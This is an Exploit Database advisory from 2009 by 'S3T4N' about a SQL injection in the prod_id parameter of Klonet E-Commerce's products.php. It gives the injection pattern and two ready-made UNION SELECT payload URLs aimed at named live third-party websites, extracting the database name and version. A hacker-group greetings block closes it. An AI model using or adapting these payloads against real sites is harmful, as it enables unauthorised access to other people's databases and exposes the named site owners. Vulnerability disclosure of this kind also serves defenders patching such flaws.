Klonet E-Commerce - 'products.php' SQL Injection

EDB-ID:

9818

CVE:

N/A

Author:

S3T4N

Type:

webapps

Platform:

PHP

Published:

2009-09-25

##################################################################
#                     _______                          __   
#   ________ _____  __\   _  \_______     ____   _____/  |_ 
#  /  ___/  |  \  \/  /  /_\  \_  __ \   /    \_/ __ \   __\
#  \___ \|  |  />    <\  \_/   \  | \/  |   |  \  ___/|  |  
# /____  >____//__/\_ \\_____  /__|    /\___|  /\___  >__|  
#      \/            \/      \/        \/    \/     \/      
##################################################################


Info=============================================================
Software	: Klonet E-Commerce
vendor		: http://www.klotnet.com/
Date		: 09/26/2009 [Indonesia]
Author		: S3T4N
Contact		: root[at]sux0r.net
Blog		: http://sux0r.net
=================================================================



SQLInjection=====================================================
File		: products.php
Exploit		: http://[target]/products.php?prod_id=[SQL]
Life Demo	: http://www.schulmerichbells.com/products.php?prod_id=-22653%20union%20select%201,2,3,4,5,database(),version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76--
		: http://www.schulmerich.org/products.php?prod_id=-1%20union%20select%201,2,3,4,5,database(),version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76--
=================================================================



Greetz===========================================================
www.MainHack.net - www.ServerIsDown.org - www.sux0r.net
VOP Crew [ Vaksin13 * OoN_Boy * Paman ]
R3VAN_BASTARD * Kecemplungkalen * em|nem
Jupe Crew [internet itu gratis jendral]
=================================================================